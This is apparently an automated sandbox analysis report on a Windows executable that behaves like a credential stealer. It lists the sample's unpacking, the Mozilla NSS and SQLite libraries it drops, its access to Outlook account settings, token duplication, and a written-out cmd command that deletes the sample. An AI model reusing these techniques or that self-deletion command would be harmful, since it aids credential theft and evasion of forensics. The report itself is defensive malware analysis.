Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_00437951 __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,GetModuleFileNameA,_strlen,_mbstowcs,CreateProcessWithTokenW,CloseHandle,Process32NextW,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Mutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Command line argument: NaF

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 4FGVZW19n7.exe, 00000000.00000002.326749464.000000006ED10000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 4FGVZW19n7.exe, 00000000.00000002.326647406.000000006EBE9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 4FGVZW19n7.exe, 00000000.00000002.326647406.000000006EBE9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: ore-memory-l1-1-0.pdb source: 4FGVZW19n7.exe, 00000000.00000003.324233473.000000004B488000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324145874.000000004B488000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000003.324241572.000000004B489000.00000004.00000010.sdmp, 4FGVZW19n7.exe, 00000000.00000002.326563960.000000004B48B000.00000004.00000010.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr, mozMapi32_InUse.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Unpacked PE file: 0.2.4FGVZW19n7.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Unpacked PE file: 0.2.4FGVZW19n7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_00466770 push eax; ret
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_004667E0 push eax; ret
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0046678F push eax; ret
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0043F18E push ecx; ret
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Code function: 0_2_0046DE3D push esi; ret

Source: AccessibleHandler.dll.0.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr	Static PE information: section name: .rodata
Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: MapiProxy.dll.0.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc
Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary,

Source: ucrtbase.dll.0.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.7848424977

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	File created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe"
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\4FGVZW19n7.exe"

Source: C:\Users\user\Desktop\4FGVZW19n7.exe

Code function: 0_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\4FGVZW19n7.exe TID: 3104	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5372	Thread sleep count: 85 > 30

Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\4FGVZW19n7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
